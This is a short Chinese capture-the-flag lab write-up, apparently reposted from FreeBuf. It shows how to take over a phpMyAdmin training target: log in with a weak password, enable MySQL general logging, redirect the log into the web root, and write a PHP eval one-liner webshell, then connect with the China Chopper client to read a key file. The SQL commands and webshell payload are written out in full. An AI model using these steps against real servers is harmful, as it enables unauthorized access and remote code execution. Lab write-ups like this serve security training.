phpMyAdmin后台文件包含分析溯源(墨者靶场入门) – 作者:可乐kele

1.首先打开靶场，看到mysql数据库登录界面

2.使用弱口令进入数据库，可以看到能执行sql语句，先看一下是否限制导入

3.数据库并没有限制导入，然后我们看一下日志的状态

4.发现是日志的状态是OFF，要先把日志状态调整到ON

相关命令：

show variables like ‘general_log’; — 查看日志是否开启

set global general_log=on; — 开启日志功能

show variables like ‘general_log_file’; — 看看日志文件保存位置

set global general_log_file=’tmp/general.lg’; — 设置日志文件保存位置

show variables like ‘log_output’; — 看看日志输出类型 table或file

set global log_output=’table’; — 设置输出类型为 table

set global log_output=’file’; — 设置输出类型为file

5.设置日志写入文件，并且写入一句话木马

SET global general_log_file=’/var/www/html/shy.php’;

自动写入日志：SELECT ‘<?php @eval($_POST[shy]);?>’;

6.通过浏览器对上次的webshell文件进行访问，发现无法访问，原因：

由于linux权限限制，禁止访问，不能执行，个体设立了失败。

7.因此转变思路，直接在sql语句中输入一句话木马，当如指定文件

8.成功后通过菜刀进行连接

9.连接成功后发现，在根目录下有名为key.txt的文件，打开以后即可得到key

来源：freebuf.com 2021-04-13 23:58:51 by: 可乐kele